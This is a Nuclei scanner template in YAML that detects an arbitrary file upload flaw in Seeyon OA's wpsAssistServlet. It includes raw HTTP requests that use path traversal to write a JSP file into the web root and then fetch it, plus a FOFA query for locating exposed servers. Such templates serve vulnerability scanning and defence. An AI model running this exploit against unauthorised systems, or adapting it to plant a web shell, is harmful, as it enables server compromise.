daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml

57 lines
2.1 KiB
YAML
Executable File
Raw Permalink Blame History

id: seeyon-oa-sp2-file-upload
info:
name: Seeyon OA wpsAssistServlet - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
There is an arbitrary file upload vulnerability in the Seeyon OA wpsAssistServlet interface. Through the vulnerability, an attacker can send a specific request packet to upload malicious files and obtain server permissions.
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- http://wiki.peiqi.tech/wiki/oa/致远OA/致远OA%20wpsAssistServlet%20任意文件上传漏洞.html
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20wpsAssistServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 2
fofa-query: app="致远互联-OA" && title="V8.0SP2"
tags: seeyon,oa,file-upload,intrusive
variables:
filename: "{{rand_base(6)}}"
string: "{{rand_base(5)}}"
http:
- raw:
- |
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="{{filename}}.xls"
Content-Type: application/vnd.ms-excel
<% out.println("{{string}}");%>
--59229605f98b8cf290a7b8908b34616b--
- |
GET /{{filename}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '"success":'
- type: word
part: body_2
words:
- '{{string}}'
- type: status
status:
- 200
# digest: 4b0a00483046022100bb099968e2f223d05e340ccaecf1d41d3174e41512550016ca487cd9b5ba35c8022100e64ed9a10f25662dcdce8bbfe6ad0c4dd52b27c8adff3c31bb0ef14a0f673eb2:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink